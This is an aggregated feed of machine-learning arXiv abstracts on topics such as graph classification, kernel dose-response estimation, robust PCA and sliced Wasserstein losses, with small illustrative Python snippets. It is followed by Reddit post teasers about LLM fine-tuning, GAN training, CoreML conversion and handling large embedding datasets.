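theta_b = rng.uniform(0.2, 1.0, size=n)  # side-B exposure propensity
examined = (rng.random(n) < theta_a) & (rng.random(n) < theta_b)
matched = examined & (rng.random(n) < true_relevance)

naive = matched.mean()                                  # biased downward
two_sided_ipw = (matched / (theta_a * theta_b)).mean()  # roughly unbiased
print(f"naive={naive:.3f}  two-sided IPW={two_sided_ipw:.3f}")
```

The naive average confounds relevance with the product of the two exposure rates, while the inverse-product weighting recovers the true relevance in expectation.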
    From Graph Generation to Graph Classification. (arXiv:2302.07989v2 [cs.LG] UPDATED)
    This note describes a new approach to classifying graphs that leverages graph generative models (GGM). Assuming a GGM that defines a joint probability distribution over graphs and their class labels, I derive classification formulas for the probability of a class label given a graph. A new conditional ELBO can be used to train a generative graph auto-encoder model for discrimination. While leveraging generative models for classification has been well explored for non-relational i.i.d. data, to our knowledge it is a novel approach to graph classification.  ( 2 min )
    Flow Map Learning for Unknown Dynamical Systems: Overview, Implementation, and Benchmarks. (arXiv:2307.11013v1 [cs.LG])
Flow map learning (FML), in conjunction with deep neural networks (DNNs), has shown promise for data-driven modeling of unknown dynamical systems. A remarkable feature of FML is that it is capable of producing accurate predictive models for partially observed systems, even when their exact mathematical models do not exist. In this paper, we present an overview of the FML framework, along with the important computational details for its successful implementation. We also present a set of well-defined benchmark problems for learning unknown dynamical systems. All the numerical details of these problems are presented, along with their FML results, to ensure that the problems are accessible for cross-examination and the results are reproducible.  ( 2 min )
    A Matrix Ensemble Kalman Filter-based Multi-arm Neural Network to Adequately Approximate Deep Neural Networks. (arXiv:2307.10436v1 [stat.ML])
Deep Learners (DLs) are the state-of-the-art predictive mechanism with applications in many fields requiring complex high-dimensional data processing. Although conventional DLs are trained via gradient descent with back-propagation, Kalman Filter (KF)-based techniques that do not need gradient computation have been developed to approximate DLs. We propose a multi-arm extension of a KF-based DL approximator that can mimic DL when the sample size is too small to train a multi-arm DL. The proposed Matrix Ensemble Kalman Filter-based multi-arm ANN (MEnKF-ANN) also performs explicit model stacking that becomes relevant when the training sample has an unequal-size feature set. Our proposed technique can approximate Long Short-term Memory (LSTM) Networks and attach uncertainty to the predictions obtained from these LSTMs with desirable coverage. We demonstrate how MEnKF-ANN can "adequately" approximate an LSTM network trained to classify what carbohydrate substrates are digested and utilized by a microbiome sample whose genomic sequences consist of polysaccharide utilization loci (PULs) and their encoded genes.  ( 2 min )
    Feed-Forward Source-Free Domain Adaptation via Class Prototypes. (arXiv:2307.10787v1 [cs.CV])
Source-free domain adaptation has become popular because of its practical usefulness and no need to access source data. However, the adaptation process still takes a considerable amount of time and is predominantly based on optimization that relies on back-propagation. In this work we present a simple feed-forward approach that challenges the need for back-propagation based adaptation. Our approach is based on computing prototypes of classes under the domain shift using a pre-trained model. It achieves strong improvements in accuracy compared to the pre-trained model and requires only a small fraction of the time of existing domain adaptation methods.  ( 2 min )
    Addressing caveats of neural persistence with deep graph persistence. (arXiv:2307.10865v1 [cs.LG])
    Neural Persistence is a prominent measure for quantifying neural network complexity, proposed in the emerging field of topological data analysis in deep learning. In this work, however, we find both theoretically and empirically that the variance of network weights and spatial concentration of large weights are the main factors that impact neural persistence. Whilst this captures useful information for linear classifiers, we find that no relevant spatial structure is present in later layers of deep neural networks, making neural persistence roughly equivalent to the variance of weights. Additionally, the proposed averaging procedure across layers for deep neural networks does not consider interaction between layers. Based on our analysis, we propose an extension of the filtration underlying neural persistence to the whole neural network instead of single layers, which is equivalent to calculating neural persistence on one particular matrix. This yields our deep graph persistence measure, which implicitly incorporates persistent paths through the network and alleviates variance-related issues through standardisation. Code is available at https://github.com/ExplainableML/Deep-Graph-Persistence .  ( 2 min )
    Sequential Kernel Embedding for Mediated and Time-Varying Dose Response Curves. (arXiv:2111.03950v4 [stat.ME] UPDATED)
    We propose simple nonparametric estimators for mediated and time-varying dose response curves based on kernel ridge regression. By embedding Pearl's mediation formula and Robins' g-formula with kernels, we allow treatments, mediators, and covariates to be continuous in general spaces, and also allow for nonlinear treatment-confounder feedback. Our key innovation is a reproducing kernel Hilbert space technique called sequential kernel embedding, which we use to construct simple estimators for complex causal estimands. Our estimators preserve the generality of classic identification while also achieving nonasymptotic uniform rates. In nonlinear simulations with many covariates, we demonstrate strong performance. We estimate mediated and time-varying dose response curves of the US Job Corps, and clean data that may serve as a benchmark in future work. We extend our results to mediated and time-varying treatment effects and counterfactual distributions, verifying semiparametric efficiency and weak convergence.  ( 2 min )
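The kernel ridge regression machinery underlying these estimators is compact. A minimal sketch (a plain one-stage KRR fit with an RBF kernel, not the paper's sequential embedding):

```python
import numpy as np

rng = np.random.default_rng(0)

def rbf_kernel(A, B, gamma=1.0):
    """Gaussian (RBF) kernel matrix between rows of A and rows of B."""
    sq = ((A[:, None, :] - B[None, :, :]) ** 2).sum(-1)
    return np.exp(-gamma * sq)

# Fit kernel ridge regression on a 1-D nonlinear function.
X = rng.uniform(-3, 3, size=(200, 1))
y = np.sin(X[:, 0]) + 0.1 * rng.standard_normal(200)

lam = 1e-2
K = rbf_kernel(X, X)
alpha = np.linalg.solve(K + lam * np.eye(len(X)), y)  # (K + λI) α = y

X_test = np.linspace(-3, 3, 50)[:, None]
y_pred = rbf_kernel(X_test, X) @ alpha
err = np.abs(y_pred - np.sin(X_test[:, 0])).max()
print(f"max abs error on the grid: {err:.3f}")
```

Sequential kernel embedding builds on exactly this kind of closed-form ridge solution, composed across stages to handle mediators and time-varying treatments.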
    Cluster-aware Semi-supervised Learning: Relational Knowledge Distillation Provably Learns Clustering. (arXiv:2307.11030v1 [stat.ML])
    Despite the empirical success and practical significance of (relational) knowledge distillation that matches (the relations of) features between teacher and student models, the corresponding theoretical interpretations remain limited for various knowledge distillation paradigms. In this work, we take an initial step toward a theoretical understanding of relational knowledge distillation (RKD), with a focus on semi-supervised classification problems. We start by casting RKD as spectral clustering on a population-induced graph unveiled by a teacher model. Via a notion of clustering error that quantifies the discrepancy between the predicted and ground truth clusterings, we illustrate that RKD over the population provably leads to low clustering error. Moreover, we provide a sample complexity bound for RKD with limited unlabeled samples. For semi-supervised learning, we further demonstrate the label efficiency of RKD through a general framework of cluster-aware semi-supervised learning that assumes low clustering errors. Finally, by unifying data augmentation consistency regularization into this cluster-aware framework, we show that despite the common effect of learning accurate clusterings, RKD facilitates a "global" perspective through spectral clustering, whereas consistency regularization focuses on a "local" perspective via expansion.  ( 2 min )
    Improving Uncertainty Quantification of Variance Networks by Tree-Structured Learning. (arXiv:2212.12658v2 [cs.LG] UPDATED)
    To improve the uncertainty quantification of variance networks, we propose a novel tree-structured local neural network model that partitions the feature space into multiple regions based on uncertainty heterogeneity. A tree is built upon giving the training data, whose leaf nodes represent different regions where region-specific neural networks are trained to predict both the mean and the variance for quantifying uncertainty. The proposed Uncertainty-Splitting Neural Regression Tree (USNRT) employs novel splitting criteria. At each node, a neural network is trained on the full data first, and a statistical test for the residuals is conducted to find the best split, corresponding to the two sub-regions with the most significant uncertainty heterogeneity between them. USNRT is computationally friendly because very few leaf nodes are sufficient and pruning is unnecessary. Furthermore, an ensemble version can be easily constructed to estimate the total uncertainty including the aleatory and epistemic. On extensive UCI datasets, USNRT or its ensemble shows superior performance compared to some recent popular methods for quantifying uncertainty with variances. Through comprehensive visualization and analysis, we uncover how USNRT works and show its merits, revealing that uncertainty heterogeneity does exist in many datasets and can be learned by USNRT.  ( 2 min )
    Causality-oriented robustness: exploiting general additive interventions. (arXiv:2307.10299v1 [stat.ME])
    Since distribution shifts are common in real-world applications, there is a pressing need for developing prediction models that are robust against such shifts. Existing frameworks, such as empirical risk minimization or distributionally robust optimization, either lack generalizability for unseen distributions or rely on postulated distance measures. Alternatively, causality offers a data-driven and structural perspective to robust predictions. However, the assumptions necessary for causal inference can be overly stringent, and the robustness offered by such causal models often lacks flexibility. In this paper, we focus on causality-oriented robustness and propose Distributional Robustness via Invariant Gradients (DRIG), a method that exploits general additive interventions in training data for robust predictions against unseen interventions, and naturally interpolates between in-distribution prediction and causality. In a linear setting, we prove that DRIG yields predictions that are robust among a data-dependent class of distribution shifts. Furthermore, we show that our framework includes anchor regression (Rothenh\"ausler et al.\ 2021) as a special case, and that it yields prediction models that protect against more diverse perturbations. We extend our approach to the semi-supervised domain adaptation setting to further improve prediction performance. Finally, we empirically validate our methods on synthetic simulations and on single-cell data.  ( 2 min )
    Robust Principal Component Analysis: A Median of Means Approach. (arXiv:2102.03403v2 [stat.ML] UPDATED)
    Principal Component Analysis (PCA) is a fundamental tool for data visualization, denoising, and dimensionality reduction. It is widely popular in Statistics, Machine Learning, Computer Vision, and related fields. However, PCA is well-known to fall prey to outliers and often fails to detect the true underlying low-dimensional structure within the dataset. Following the Median of Means (MoM) philosophy, recent supervised learning methods have shown great success in dealing with outlying observations without much compromise to their large sample theoretical properties. This paper proposes a PCA procedure based on the MoM principle. Called the \textbf{M}edian of \textbf{M}eans \textbf{P}rincipal \textbf{C}omponent \textbf{A}nalysis (MoMPCA), the proposed method is not only computationally appealing but also achieves optimal convergence rates under minimal assumptions. In particular, we explore the non-asymptotic error bounds of the obtained solution via the aid of the Rademacher complexities while granting absolutely no assumption on the outlying observations. The derived concentration results are not dependent on the dimension because the analysis is conducted in a separable Hilbert space, and the results only depend on the fourth moment of the underlying distribution in the corresponding norm. The proposal's efficacy is also thoroughly showcased through simulations and real data applications.  ( 2 min )
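The MoM idea can be illustrated in a few lines (a simplistic median-of-blocks covariance, NOT the paper's MoMPCA procedure): estimating the covariance on disjoint blocks and taking an elementwise median blunts the influence of a few gross outliers.

```python
import numpy as np

rng = np.random.default_rng(0)

# Data with one dominant direction (variance 9 along axis 0) plus a few
# gross outliers that would wreck a plain covariance estimate.
n, d, n_blocks = 1000, 5, 10
X = rng.standard_normal((n, d)) * np.array([3.0, 1.0, 1.0, 1.0, 1.0])
X[:3] += 100.0  # a few gross outliers

# Covariance per disjoint block, then elementwise median across blocks:
# the corrupted blocks land in the tails and the median ignores them.
blocks = np.array_split(rng.permutation(n), n_blocks)
covs = np.stack([np.cov(X[b].T) for b in blocks])
robust_cov = np.median(covs, axis=0)

eigvals, eigvecs = np.linalg.eigh(robust_cov)
top_pc = eigvecs[:, -1]  # leading direction survives the outliers
print("leading PC (abs):", np.round(np.abs(top_pc), 2))
```

This elementwise-median shortcut only conveys the flavour; the paper's MoMPCA and its optimality guarantees are built on a proper median-of-means construction in a separable Hilbert space.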
    Representing Random Utility Choice Models with Neural Networks. (arXiv:2207.12877v2 [cs.LG] UPDATED)
    Motivated by the successes of deep learning, we propose a class of neural network-based discrete choice models, called RUMnets, inspired by the random utility maximization (RUM) framework. This model formulates the agents' random utility function using a sample average approximation. We show that RUMnets sharply approximate the class of RUM discrete choice models: any model derived from random utility maximization has choice probabilities that can be approximated arbitrarily closely by a RUMnet. Reciprocally, any RUMnet is consistent with the RUM principle. We derive an upper bound on the generalization error of RUMnets fitted on choice data, and gain theoretical insights on their ability to predict choices on new, unseen data depending on critical parameters of the dataset and architecture. By leveraging open-source libraries for neural networks, we find that RUMnets are competitive against several choice modeling and machine learning methods in terms of predictive accuracy on two real-world datasets.  ( 2 min )
    Tuning Stochastic Gradient Algorithms for Statistical Inference via Large-Sample Asymptotics. (arXiv:2207.12395v3 [stat.CO] UPDATED)
    The tuning of stochastic gradient algorithms (SGAs) for optimization and sampling is often based on heuristics and trial-and-error rather than generalizable theory. We address this theory--practice gap by characterizing the large-sample statistical asymptotics of SGAs via a joint step-size--sample-size scaling limit. We show that iterate averaging with a large fixed step size is robust to the choice of tuning parameters and asymptotically has covariance proportional to that of the MLE sampling distribution. We also prove a Bernstein--von Mises-like theorem to guide tuning, including for generalized posteriors that are robust to model misspecification. Numerical experiments validate our results and recommendations in realistic finite-sample regimes. Our work lays the foundation for a systematic analysis of other stochastic gradient Markov chain Monte Carlo algorithms for a wide range of models.  ( 2 min )
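The headline phenomenon, that averaged iterates of an SGA with a large fixed step size concentrate near the optimum even while the raw iterates oscillate, shows up already on a toy quadratic (a sketch with illustrative constants):

```python
import numpy as np

rng = np.random.default_rng(0)

# SGD with a large fixed step size on f(x) = 0.5 * E[(x - z)^2], z ~ N(2, 1):
# raw iterates bounce around the minimizer x* = 2, but their running
# average (Polyak-Ruppert averaging) settles close to it.
step, n_iters = 0.5, 5_000
x, iterates = 0.0, []
for _ in range(n_iters):
    z = 2.0 + rng.standard_normal()
    x -= step * (x - z)          # stochastic gradient of the quadratic
    iterates.append(x)

avg = np.mean(iterates[1_000:])  # discard warm-up, then average
print(f"last iterate: {iterates[-1]:.2f}, averaged: {avg:.2f}")
```

The raw final iterate can sit anywhere within the stationary noise band, while the average is stable to the step-size choice, which is the robustness property the paper formalizes.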
    A Bayesian Programming Approach to Car-following Model Calibration and Validation using Limited Data. (arXiv:2307.10437v1 [cs.LG])
    Traffic simulation software is used by transportation researchers and engineers to design and evaluate changes to roadways. These simulators are driven by models of microscopic driver behavior from which macroscopic measures like flow and congestion can be derived. Many models are designed for a subset of possible traffic scenarios and roadway configurations, while others have no explicit constraints on their application. Work zones (WZs) are one scenario for which no model to date has reproduced realistic driving behavior. This makes it difficult to optimize for safety and other metrics when designing a WZ. The Federal Highway Administration commissioned the USDOT Volpe Center to develop a car-following (CF) model for use in microscopic simulators that can capture and reproduce driver behavior accurately within and outside of WZs. Volpe also performed a naturalistic driving study to collect telematics data from vehicles driven on roads with WZs for use in model calibration. During model development, Volpe researchers observed difficulties in calibrating their model, leaving them to question whether there existed flaws in their model, in the data, or in the procedure used to calibrate the model using the data. In this thesis, I use Bayesian methods for data analysis and parameter estimation to explore and, where possible, address these questions. First, I use Bayesian inference to measure the sufficiency of the size of the data set. Second, I compare the procedure and results of the genetic algorithm based calibration performed by the Volpe researchers with those of Bayesian calibration. Third, I explore the benefits of modeling CF hierarchically. Finally, I apply what was learned in the first three phases using an established CF model, Wiedemann 99, to the probabilistic modeling of the Volpe model. Validation is performed using information criteria as an estimate of predictive accuracy.  ( 3 min )
    Properties of Discrete Sliced Wasserstein Losses. (arXiv:2307.10352v1 [stat.ML])
    The Sliced Wasserstein (SW) distance has become a popular alternative to the Wasserstein distance for comparing probability measures. Widespread applications include image processing, domain adaptation and generative modelling, where it is common to optimise some parameters in order to minimise SW, which serves as a loss function between discrete probability measures (since measures admitting densities are numerically unattainable). All these optimisation problems bear the same sub-problem, which is minimising the Sliced Wasserstein energy. In this paper we study the properties of $\mathcal{E}: Y \longmapsto \mathrm{SW}_2^2(\gamma_Y, \gamma_Z)$, i.e. the SW distance between two uniform discrete measures with the same amount of points as a function of the support $Y \in \mathbb{R}^{n \times d}$ of one of the measures. We investigate the regularity and optimisation properties of this energy, as well as its Monte-Carlo approximation $\mathcal{E}_p$ (estimating the expectation in SW using only $p$ samples) and show convergence results on the critical points of $\mathcal{E}_p$ to those of $\mathcal{E}$, as well as an almost-sure uniform convergence. Finally, we show that in a certain sense, Stochastic Gradient Descent methods minimising $\mathcal{E}$ and $\mathcal{E}_p$ converge towards (Clarke) critical points of these energies.  ( 2 min )
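The Monte-Carlo approximation $\mathcal{E}_p$ discussed above is straightforward to implement: sample p random directions, project both point clouds, and average the 1-D squared Wasserstein costs, which for equal-weight atoms reduce to matching sorted points. A minimal numpy sketch:

```python
import numpy as np

rng = np.random.default_rng(0)

def sw2_squared_mc(Y, Z, p=500, rng=rng):
    """Monte Carlo estimate of SW_2^2 between two uniform discrete
    measures with the same number of points (rows of Y and Z)."""
    n, d = Y.shape
    thetas = rng.standard_normal((p, d))
    thetas /= np.linalg.norm(thetas, axis=1, keepdims=True)
    # In 1-D, optimal transport between equal-weight atoms matches
    # sorted points to sorted points.
    py = np.sort(Y @ thetas.T, axis=0)
    pz = np.sort(Z @ thetas.T, axis=0)
    return ((py - pz) ** 2).sum(axis=0).mean() / n

Y = rng.standard_normal((100, 3))
Z = Y + 1.0  # shift every point by (1, 1, 1)
est = sw2_squared_mc(Y, Z)
print(f"estimated SW_2^2: {est:.3f}")
```

For a pure shift by a vector v, each projected cost equals (θ·v)², so SW_2² averages to ‖v‖²/d (here 1), which makes the estimator easy to sanity-check.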

  • Open

    Computer chip with built-in human brain tissue gets military funding
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Stability AI: Meet FreeWilly, Our Large And Mighty Instruction Fine-Tuned Models
    submitted by /u/nickb [link] [comments]  ( 8 min )
    LLaMA2 isn't "Open Source" - and why it doesn't matter
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    [D] When will LLMs start being used in RL processes to train their rationality?
    People are always so dismissive that LLMs are just autoregressive. When will we start doing things like Actor Critic to train LLMs in a sort of game against themselves to pass the test accurately or play a game or solve a science problem or write code. I feel like this has to be a vibrant research field. submitted by /u/Intelligent_Rough_21 [link] [comments]  ( 8 min )
    [D] How to improve GANs by penalizing previous epoch if it performed poorly?
I use GANs (generative adversarial networks) in Python/Keras to synthesize tabular data, with loss functions for the discriminator and generator. On top of that, I synthesize data after each epoch and compare it to real data (using a specific metric) to see how good the results are, as it varies quite a bit over successive epochs. If one epoch produces a bad synthesis, how can I tell my GAN to stay away from such configurations moving forward (thus penalizing it)? Likewise, if one epoch produces great results, how can I reward my GAN and tell it to do more of those? submitted by /u/MLRecipes [link] [comments]  ( 9 min )
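One common pattern for the question above (not a change to the GAN losses themselves) is a best-checkpoint rollback: score the synthesized data after each epoch and restore the generator's best-so-far weights when an epoch makes the metric worse. A framework-agnostic sketch with a Keras-style get_weights/set_weights stub:

```python
import copy

# StubGenerator stands in for a Keras model exposing get_weights /
# set_weights; epoch_scores stands in for the per-epoch quality metric
# (lower = better) computed on synthesized vs. real data.
class StubGenerator:
    def __init__(self):
        self.weights = [0.0]
    def get_weights(self):
        return copy.deepcopy(self.weights)
    def set_weights(self, w):
        self.weights = copy.deepcopy(w)

def train_with_rollback(generator, epoch_scores):
    best_score = float("inf")
    best_weights = generator.get_weights()
    for epoch, score in enumerate(epoch_scores):
        generator.weights[0] = float(epoch + 1)  # stand-in for one epoch of training
        if score < best_score:
            best_score = score
            best_weights = generator.get_weights()
        else:
            generator.set_weights(best_weights)  # discard the bad epoch
    return best_score

gen = StubGenerator()
best = train_with_rollback(gen, [0.9, 0.5, 0.8, 0.4])
print(best)  # → 0.4
```

This doesn't "teach" the GAN to avoid bad configurations in a gradient sense, but it guarantees training never drifts away from the best synthesis seen so far; folding the metric into the generator loss as an auxiliary term is the heavier-weight alternative.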
    [D] How to lead LLMs to home in on the solution to a problem. Case example: How to make LLMs more intelligent.
    Using LLMs to solve problems can be facilitated through a two-step process that is repeated until a desired understanding is reached. Generally, the process advances as shown in the following prompts: What is the most promising approach to solving a certain problem? What is the greatest challenge to achieving this approach? What is the most promising approach to meeting this challenge? What is the greatest challenge to achieving this approach? As you can see, the strategy involves two basic steps, (1 and 2) that are repeated over and over until the essence, or potential required actionable tasks, of the problem are revealed. Here's an example of this strategy being used to better understand how LLMs can be made more intelligent. As you will notice, it is useful to limit the respo…  ( 10 min )
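The alternating two-step loop described above can be sketched as follows; `ask` is a placeholder for any chat-completion call (no real API is used here):

```python
# Repeatedly alternate "most promising approach" and "greatest challenge"
# prompts, drilling toward the essence of the problem.
def ask(prompt):
    return f"<answer to: {prompt}>"  # placeholder for an LLM call

def drill_down(problem, rounds=3):
    transcript = []
    approach = ask(f"What is the most promising approach to solving {problem}?")
    transcript.append(approach)
    for _ in range(rounds):
        challenge = ask(f"What is the greatest challenge to achieving this approach? {approach}")
        approach = ask(f"What is the most promising approach to meeting this challenge? {challenge}")
        transcript.extend([challenge, approach])
    return transcript

t = drill_down("making LLMs more intelligent", rounds=2)
print(len(t))  # 1 initial answer + 2 entries per round
```

In practice each prompt would also carry the running conversation as context so the model refines rather than restarts.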
    [R] Towards A Unified Agent with Foundation Models - Google DeepMind, ICLR23, July 2023 - LLM + RL leads to substantial performance improvements!
    Paper: https://arxiv.org/abs/2307.09668 Abstract: Language Models and Vision Language Models have recently demonstrated unprecedented capabilities in terms of understanding human intentions, reasoning, scene understanding, and planning-like behaviour, in text form, among many others. In this work, we investigate how to embed and leverage such abilities in Reinforcement Learning (RL) agents. We design a framework that uses language as the core reasoning tool, exploring how this enables an agent to tackle a series of fundamental RL challenges, such as efficient exploration, reusing experience data, scheduling skills, and learning from observations, which traditionally require separate, vertically designed algorithms. We test our method on a sparse-reward simulated robotic manipulation environment, where a robot needs to stack a set of objects. We demonstrate substantial performance improvements over baselines in exploration efficiency and ability to reuse data from offline datasets, and illustrate how to reuse learned skills to solve novel tasks or imitate videos of human experts. https://preview.redd.it/voehn3aa3ddb1.jpg?width=1101&format=pjpg&auto=webp&s=c367c7b1042d11b3e2a2b2109c95482f8555747b https://preview.redd.it/6ei186aa3ddb1.jpg?width=617&format=pjpg&auto=webp&s=10e1928769da9552aabdcf084b45f5e6be2ec97e https://preview.redd.it/umg3b7aa3ddb1.jpg?width=1353&format=pjpg&auto=webp&s=2be83b87e6b3553c6d1770a579f9a9aa69c238dd https://preview.redd.it/ushea8aa3ddb1.jpg?width=1661&format=pjpg&auto=webp&s=67edddd76c0cdde67c0e9502fd76fbc1a9247946 ​ submitted by /u/Singularian2501 [link] [comments]  ( 9 min )
    [P] RepoChat - open source project for chatting with your own code repositories
    Hey! Just a quick note that I built an open-source tool to chat with your own code repository, I'm calling it RepoChat for now. This was my first time really ever working with LLMs or anything AI / Machine Learning related, but I wanted to hack something together so I didn't have to keep copy-pasting code into chat.openai.com when I was coding. Let me know what you think. It's not beautiful, but it works! If you see anything you'd like to fix, feel free to contribute to this open source project. The biggest trick was figuring out how to keep token limits sane. I'm sure there are more refinements, but it's working pretty well as of now. submitted by /u/maniflex_destiny [link] [comments]  ( 9 min )
    [D] Can LLMs keep getting better arbitrarily or would we hit a limit?
The way I see it, if LLMs become the de facto tool for content generation, summarization, image generation etc., at some point the amount of machine-generated content will surpass human-generated content, and the gap will keep widening. Can anyone give some insight as to whether LLMs will stop improving and actually start degrading as they are retrained on more and more machine-generated content? submitted by /u/Western-Image7125 [link] [comments]  ( 9 min )
    [D] Beyond LLMs, What Cool ML Projects Are You Building?
    It seems like everyone is rushing into working in LLMs, but I'm curious to know what other cool machine learning projects you're working on submitted by /u/Ahmed-Allam-220 [link] [comments]  ( 8 min )
    [D] Object detection models that can be easily converted to CoreML
I've managed to train and convert to CoreML a YOLO model; they've really made that easy. However, using it in a commercial product requires paying $5-10k/y. Are there any other repos/libraries for object detection that can be trained in PyTorch/TF and then converted to CoreML? I've come across: - https://github.com/apple/ml-cvnets - https://github.com/open-mmlab/mmdeploy Has anyone managed to train an object detection model with them and convert it to CoreML? I'd like to hear some success stories before digging deep into these frameworks. Also, I tried converting some Detectron models to CoreML a long time ago, but ended up with `operation not supported`... Thanks! submitted by /u/alkibijad [link] [comments]  ( 9 min )
    [P] Tips for Machine learning notebook refactor to production?
I need to refactor a lot of forecast models. Each forecast model is kinda similar, and we run them in a batch pipeline. So, my strategy is to use an abstract factory design pattern: I will create a super class that each forecast model implements. But I don't think I have enough background to come up with a very good software design for this problem. Do you recommend any resources or concepts to solve this problem? submitted by /u/Muted_Standard175 [link] [comments]  ( 9 min )
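One way to sketch the super-class idea from the post above is a template-method style abstract base class: the batch-pipeline contract lives in the base, and each forecast model implements only its specifics (all names here are illustrative):

```python
from abc import ABC, abstractmethod

# The base class fixes the pipeline steps; subclasses fill in the
# model-specific parts. Shared steps get overridable defaults.
class BaseForecast(ABC):
    def run(self, raw):
        data = self.preprocess(raw)
        model = self.fit(data)
        return self.predict(model, data)

    def preprocess(self, raw):  # shared default, overridable
        return [float(x) for x in raw]

    @abstractmethod
    def fit(self, data): ...

    @abstractmethod
    def predict(self, model, data): ...

class NaiveForecast(BaseForecast):
    def fit(self, data):
        return data[-1]          # the "model" is just the last value
    def predict(self, model, data):
        return [model] * 3       # flat 3-step-ahead forecast

print(NaiveForecast().run([1, 2, 3]))
```

A factory (mapping a config string to the right subclass) then lets the batch pipeline instantiate each forecast without knowing its concrete class; "Design Patterns" material on Template Method and Abstract Factory covers both halves.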
    [P] Open Source Image to Text Model
Haven't been keeping up with deep learning and computer vision papers the last few years. What are some hot open-source image-to-text models right now? submitted by /u/I_am_not_doing_this [link] [comments]  ( 8 min )
    [N] Novel Model for Tabular Data: IGANN: Looks Like a Leap Towards Interpretable Machine Learning!
Hey, fellow Machine Learning enthusiasts! There is a novel ML model called Interpretable Generalized Additive Neural Networks (IGANN). I tried it out and it worked pretty smoothly, out of the box! I used some tabular data I had at hand and it gave me insightful plots!! The authors pitch it as a game-changing approach to interpretability in Machine Learning. For the uninitiated, IGANN is described as a model that leverages gradient boosting and tailored neural networks to provide better predictive performance while retaining interpretability. Even in its hyperparameter-tuned version it is not always the best interpretable model, but it is mostly worth giving a try. It does so by deploying an efficient training algorithm derived from t…  ( 10 min )
    [D] Fine-tuning LLM on company data
    Hey Redditors, I was looking into fine-tuning some open-source LLMs like Llama 2 or Falcon with our company data as a fun project. I was thinking about using some Slack channels, ZenDesk Tickets and perhaps Github/Confluence data I was wondering two things: 1. How have your experiences been with PEFT methods in practice? Anything I should be aware of compared to regular fine-tuning? 2. Which model size would you recommend for a relatively small sized company (60 people) and how many GPUs (H100) would you roughly expect to need? I understand this depends on the size of the dataset but I haven't indexed it so far so any ballpark numbers are welcome. Many thanks! submitted by /u/RufusLdn [link] [comments]  ( 9 min )
    [R] A Composable Customer Data Platform (CDP) for the combination of software and tools for data collection, storage & modeling, and activation
    Unlike traditional all-in-one CDPs, a composable CDP is like Lego building blocks — you pick the best components to build what you want. To personalize customer experience, to boost automation and to power up marketing. Traditional vs. Composable Classic CDPs integrate different needs into a single streamlined product. Such a platform creates a unified customer database and offers various functionalities (e.g. data collection) that are quickly accessible by other systems. A composable CDP, on the other hand, utilizes the best-in-class components for every step using your preferred components. Data collection and data creation systems of your choice, a data platform to store and process the data, and components to activate the insights in CRM, marketing or self-service analytics. ​ Key…  ( 10 min )
    Run DisCo: Disentangled Control for Referring Human Dance Generation in Real World locally with own hardware. Looking for Guide / Tutorial [D] [P]
    Hi everyone, I'm trying to run DisCo (Disentangled Control for Referring Human Dance Generation in Real World) on my own hardware, but I'm having some trouble installing it. I am neither a professional nor a complete beginner, but I still find the guide on the official GitHub page confusing. Does someone have experience running it locally? I would be really happy for some kind of guide or tutorial. I have an RTX 3060 12GB. Thanks in advance for your help! submitted by /u/Elwii04 [link] [comments]  ( 9 min )
    How to Create an Animation of the Embeddings During Fine-Tuning [P]
    In a recent article, I used an animation to demonstrate changes in the embeddings during the fine-tuning process. This was achieved by performing Principal Component Analysis (PCA) on the embeddings. These embeddings were generated from models at various stages of fine-tuning and their corresponding checkpoints. Projection of embeddings with PCA during fine-tuning of a Vision Transformer (ViT) model [1] on CIFAR10 [3]; Source: created by the author — Published before in Changes of Embeddings during Fine-Tuning Here, I aim to provide a comprehensive guide on how to create such an animation, as requested by many readers. The full code is available in the Story Section in the Spotlight GitHub Repository. Step 1: Fine-tuning The first step is to fine-tune the google/vit-base-patch16-224…  ( 10 min )
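The trick that makes such an animation meaningful is fitting the PCA basis once and projecting every checkpoint's embeddings with that same fixed basis, so frames are comparable across checkpoints. A hedged numpy sketch of that core step (the checkpoint embeddings here are random stand-ins for embeddings extracted from saved models):

```python
import numpy as np

rng = np.random.default_rng(42)

def fit_pca_basis(embeddings, n_components=2):
    """Fit a PCA basis once; reuse it for every checkpoint's embeddings."""
    mean = embeddings.mean(axis=0)
    # SVD of the centered data; rows of Vt are the principal directions
    _, _, Vt = np.linalg.svd(embeddings - mean, full_matrices=False)
    return mean, Vt[:n_components]

def project(embeddings, mean, basis):
    return (embeddings - mean) @ basis.T

# Stand-ins for embeddings extracted at several fine-tuning checkpoints
checkpoints = [rng.standard_normal((200, 768)) for _ in range(5)]

mean, basis = fit_pca_basis(checkpoints[0])   # fixed basis from one reference set
frames = [project(e, mean, basis) for e in checkpoints]
print(frames[0].shape)  # (200, 2)
```

Each (200, 2) frame can then be drawn as one scatter frame with matplotlib.animation.FuncAnimation.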
    [D] How to work with large datasets of embeddings?
    I have a dataset in a CSV file which I open and analyse as a Pandas dataframe. I am now generating embeddings based on some of this data, which I want to analyse as well. The dataset is rather big (millions of rows), so I noticed that appending and storing the embeddings as part of the Pandas dataframe makes me run out of RAM. Aside from that, storing and saving numpy arrays in a dataframe is also a bit awkward. Since I want to analyze the whole dataset including embeddings, storing them in so-called embedding stores doesn't make a lot of sense, since I always want to loop over the whole set anyway. Are there any best practices or recommendations for how to work with this data? submitted by /u/Dutchcheesehead [link] [comments]  ( 9 min )
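One common pattern for this situation: keep the embeddings out of the DataFrame entirely and stream over a disk-backed numpy array, so only one chunk is in RAM at a time. A sketch under assumed sizes (Parquet or a chunked store like zarr are reasonable alternatives for the same idea):

```python
import numpy as np
import tempfile, os

# Write embeddings to a disk-backed .npy instead of holding them in a DataFrame
path = os.path.join(tempfile.mkdtemp(), "embeddings.npy")
n, dim = 10_000, 128  # stand-in sizes; the pattern is the same at millions of rows
emb = np.lib.format.open_memmap(path, mode="w+", dtype=np.float32, shape=(n, dim))

rng = np.random.default_rng(0)
for start in range(0, n, 1_000):          # fill (and later analyze) in chunks
    emb[start:start + 1_000] = rng.standard_normal((1_000, dim), dtype=np.float32)
emb.flush()

# Analysis pass: stream over chunks; only one chunk is in RAM at a time
chunk_means = []
for start in range(0, n, 1_000):
    chunk_means.append(emb[start:start + 1_000].mean(axis=0))
global_mean = np.mean(chunk_means, axis=0)  # chunks are equal-sized, so this is exact
print(global_mean.shape)  # (128,)
```

Any per-row or reduction-style analysis can be expressed this way; row indices line up with the DataFrame, so you never need to store arrays inside it.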
    [R] Are ViT Transformers also biased towards Texture information like CNNs?
